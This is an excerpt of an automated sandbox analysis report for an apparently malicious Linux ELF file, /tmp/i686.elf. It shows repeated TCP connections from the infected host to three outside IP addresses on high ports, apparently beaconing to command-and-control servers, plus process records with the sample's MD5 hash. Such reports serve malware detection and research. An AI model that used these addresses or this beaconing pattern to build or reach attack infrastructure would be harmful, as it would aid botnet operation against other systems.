                                                      Jan 4, 2025 23:59:49.361191034 CET3707619823192.168.2.23156.244.6.20
                                                      Jan 4, 2025 23:59:49.366045952 CET1982337076156.244.6.20192.168.2.23
                                                      Jan 4, 2025 23:59:49.366112947 CET3707619823192.168.2.23156.244.6.20
                                                      Jan 4, 2025 23:59:50.337167025 CET1982337076156.244.6.20192.168.2.23
                                                      Jan 4, 2025 23:59:50.337212086 CET3707619823192.168.2.23156.244.6.20
                                                      Jan 4, 2025 23:59:50.361887932 CET3707619823192.168.2.23156.244.6.20
                                                      Jan 4, 2025 23:59:50.367218018 CET1982337076156.244.6.20192.168.2.23
                                                      Jan 4, 2025 23:59:50.367253065 CET3707619823192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:00.827198982 CET5602845123192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:00.832026005 CET4512356028156.244.6.20192.168.2.23
                                                      Jan 5, 2025 00:00:00.832088947 CET5602845123192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:01.804971933 CET4512356028156.244.6.20192.168.2.23
                                                      Jan 5, 2025 00:00:01.805062056 CET5602845123192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:01.829237938 CET5602845123192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:01.834249973 CET4512356028156.244.6.20192.168.2.23
                                                      Jan 5, 2025 00:00:01.834294081 CET5602845123192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:12.343765020 CET5819049657192.168.2.23188.166.182.194
                                                      Jan 5, 2025 00:00:12.621694088 CET4965758190188.166.182.194192.168.2.23
                                                      Jan 5, 2025 00:00:12.621788025 CET5819049657192.168.2.23188.166.182.194
                                                      Jan 5, 2025 00:00:13.451224089 CET4965758190188.166.182.194192.168.2.23
                                                      Jan 5, 2025 00:00:13.451299906 CET5819049657192.168.2.23188.166.182.194
                                                      Jan 5, 2025 00:00:13.451333046 CET5819049657192.168.2.23188.166.182.194
                                                      Jan 5, 2025 00:00:13.457190037 CET4965758190188.166.182.194192.168.2.23
                                                      Jan 5, 2025 00:00:13.457283020 CET5819049657192.168.2.23188.166.182.194
                                                      Jan 5, 2025 00:00:23.941917896 CET5603245123192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:23.946679115 CET4512356032156.244.6.20192.168.2.23
                                                      Jan 5, 2025 00:00:23.946747065 CET5603245123192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:24.958971977 CET4512356032156.244.6.20192.168.2.23
                                                      Jan 5, 2025 00:00:24.959028959 CET5603245123192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:24.959055901 CET5603245123192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:24.964061022 CET4512356032156.244.6.20192.168.2.23
                                                      Jan 5, 2025 00:00:24.964131117 CET5603245123192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:35.434572935 CET4169218234192.168.2.2338.60.221.89
                                                      Jan 5, 2025 00:00:35.439429998 CET182344169238.60.221.89192.168.2.23
                                                      Jan 5, 2025 00:00:35.439505100 CET4169218234192.168.2.2338.60.221.89
                                                      Jan 5, 2025 00:00:36.461657047 CET182344169238.60.221.89192.168.2.23
                                                      Jan 5, 2025 00:00:36.461755991 CET4169218234192.168.2.2338.60.221.89
                                                      Jan 5, 2025 00:00:36.461803913 CET4169218234192.168.2.2338.60.221.89
                                                      Jan 5, 2025 00:00:36.466902018 CET182344169238.60.221.89192.168.2.23
                                                      Jan 5, 2025 00:00:36.467210054 CET182344169238.60.221.89192.168.2.23
                                                      Jan 5, 2025 00:00:36.467278004 CET4169218234192.168.2.2338.60.221.89
                                                      Jan 5, 2025 00:00:46.931759119 CET471245429192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:46.936618090 CET542947124156.244.6.20192.168.2.23
                                                      Jan 5, 2025 00:00:46.936706066 CET471245429192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:47.917716980 CET542947124156.244.6.20192.168.2.23
                                                      Jan 5, 2025 00:00:47.917804956 CET471245429192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:47.932547092 CET471245429192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:47.937752962 CET542947124156.244.6.20192.168.2.23
                                                      Jan 5, 2025 00:00:47.937809944 CET471245429192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:58.441430092 CET5429662849192.168.2.2338.60.221.89
                                                      Jan 5, 2025 00:00:58.446293116 CET628495429638.60.221.89192.168.2.23
                                                      Jan 5, 2025 00:00:58.446340084 CET5429662849192.168.2.2338.60.221.89
                                                      Jan 5, 2025 00:00:59.464685917 CET628495429638.60.221.89192.168.2.23
                                                      Jan 5, 2025 00:00:59.464732885 CET5429662849192.168.2.2338.60.221.89
                                                      Jan 5, 2025 00:00:59.464824915 CET5429662849192.168.2.2338.60.221.89
                                                      Jan 5, 2025 00:00:59.469804049 CET628495429638.60.221.89192.168.2.23
                                                      Jan 5, 2025 00:00:59.469865084 CET5429662849192.168.2.2338.60.221.89
                                                      Jan 5, 2025 00:01:11.971227884 CET3463631428192.168.2.2338.60.221.89
                                                      Jan 5, 2025 00:01:11.976025105 CET314283463638.60.221.89192.168.2.23
                                                      Jan 5, 2025 00:01:11.976103067 CET3463631428192.168.2.2338.60.221.89
                                                      Jan 5, 2025 00:01:13.013537884 CET314283463638.60.221.89192.168.2.23
                                                      Jan 5, 2025 00:01:13.013607979 CET3463631428192.168.2.2338.60.221.89
                                                      Jan 5, 2025 00:01:13.013654947 CET3463631428192.168.2.2338.60.221.89
                                                      Jan 5, 2025 00:01:13.018668890 CET314283463638.60.221.89192.168.2.23
                                                      Jan 5, 2025 00:01:13.018727064 CET3463631428192.168.2.2338.60.221.89
                                                      Jan 5, 2025 00:01:25.497220039 CET4953464715192.168.2.23188.166.182.194
                                                      Jan 5, 2025 00:01:25.501997948 CET6471549534188.166.182.194192.168.2.23
                                                      Jan 5, 2025 00:01:25.502048016 CET4953464715192.168.2.23188.166.182.194
                                                      Jan 5, 2025 00:01:26.306862116 CET6471549534188.166.182.194192.168.2.23
                                                      Jan 5, 2025 00:01:26.306929111 CET4953464715192.168.2.23188.166.182.194
                                                      Jan 5, 2025 00:01:26.498007059 CET4953464715192.168.2.23188.166.182.194
                                                      Jan 5, 2025 00:01:26.502922058 CET6471549534188.166.182.194192.168.2.23
                                                      Jan 5, 2025 00:01:26.503002882 CET6471549534188.166.182.194192.168.2.23
                                                      Jan 5, 2025 00:01:26.503070116 CET4953464715192.168.2.23188.166.182.194
                                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS

                                                      System Behavior

                                                      Start time (UTC):22:57:52
                                                      Start date (UTC):04/01/2025
                                                      Path:/tmp/i686.elf
                                                      Arguments:/tmp/i686.elf
                                                      File size:91792 bytes
                                                      MD5 hash:20f4bca1aa1a3bcdf7d2b60cea290831

                                                      Start time (UTC):22:57:53
                                                      Start date (UTC):04/01/2025
                                                      Path:/tmp/i686.elf
                                                      Arguments:-
                                                      File size:91792 bytes
                                                      MD5 hash:20f4bca1aa1a3bcdf7d2b60cea290831

                                                      Start time (UTC):22:57:53
                                                      Start date (UTC):04/01/2025
                                                      Path:/tmp/i686.elf
                                                      Arguments:-
                                                      File size:91792 bytes
                                                      MD5 hash:20f4bca1aa1a3bcdf7d2b60cea290831

                                                      Start time (UTC):22:57:53
                                                      Start date (UTC):04/01/2025
                                                      Path:/tmp/i686.elf
                                                      Arguments:-
                                                      File size:91792 bytes
                                                      MD5 hash:20f4bca1aa1a3bcdf7d2b60cea290831

                                                      Start time (UTC):22:57:54
                                                      Start date (UTC):04/01/2025
                                                      Path:/tmp/i686.elf
                                                      Arguments:-
                                                      File size:91792 bytes
                                                      MD5 hash:20f4bca1aa1a3bcdf7d2b60cea290831

                                                      Start time (UTC):22:57:54
                                                      Start date (UTC):04/01/2025
                                                      Path:/tmp/i686.elf
                                                      Arguments:-
                                                      File size:91792 bytes
                                                      MD5 hash:20f4bca1aa1a3bcdf7d2b60cea290831